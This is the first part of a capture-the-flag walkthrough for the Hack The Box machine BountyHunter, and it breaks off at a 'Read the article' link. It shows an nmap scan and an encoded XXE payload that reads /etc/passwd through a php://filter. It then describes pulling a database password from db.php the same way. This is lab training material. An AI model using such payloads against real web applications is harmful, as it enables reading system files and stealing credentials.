Hack The Box — BountyHunter Walkthrough

Share on facebook
Share on twitter
Share on linkedin
Share on reddit
Share on email

Hack The Box — BountyHunter Walkthrough

Hello guys, Hope you are good and well. We are gonna see the walkthrough of the BountyHunter machine in Hack The Box.

First, we start with a Nmap scan.

nmap -sC -sV 10.10.11.100

Nmap scan

Now, there is only a web app running. The web app has a portal where it has some details of a CVE records.

Web portal

So, now we will look for XXE vulnerability. Because the data is sent in XML format when looking at the burp request. Now, we will encode the payload with URL encode and Base64 in cyberchef and result of the payload is

PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4KPCFET0NUWVBFIGZvbyBbIDwhRU5USVRZIHh4ZSBTWVNURU0gInBocDovL2ZpbHRlci9jb252ZXJ0LmJhc2U2NC1lbmNvZGUvcmVzb3VyY2U9L2V0Yy9wYXNzd2QiPl0gPiAKCQk8YnVncmVwb3J0PgoJCTx0aXRsZT4meHhlOzwvdGl0bGU%2BCgkJPGN3ZT50ZXN0PC9jd2U%2BCgkJPGN2c3M%2BdGVzdDwvY3Zzcz4KCQk8cmV3YXJkPnRlc3Q8L3Jld2FyZD4KCQk8L2J1Z3JlcG9ydD4%3D

Now, inserting this. We get the result in base64 when decrypting it shows the etc/passwd file like below,

source: base64decode.org

Now, we will try to get the contents of the db file with the payload below which is generated by cyberchef.

Source: cyberchef

After, inserting this payload, We will get the db.php file content.

source: base64decode.org

Here, we can get the password. Now, we will try to login with the SSH for admin user and we failed and then we

Read the article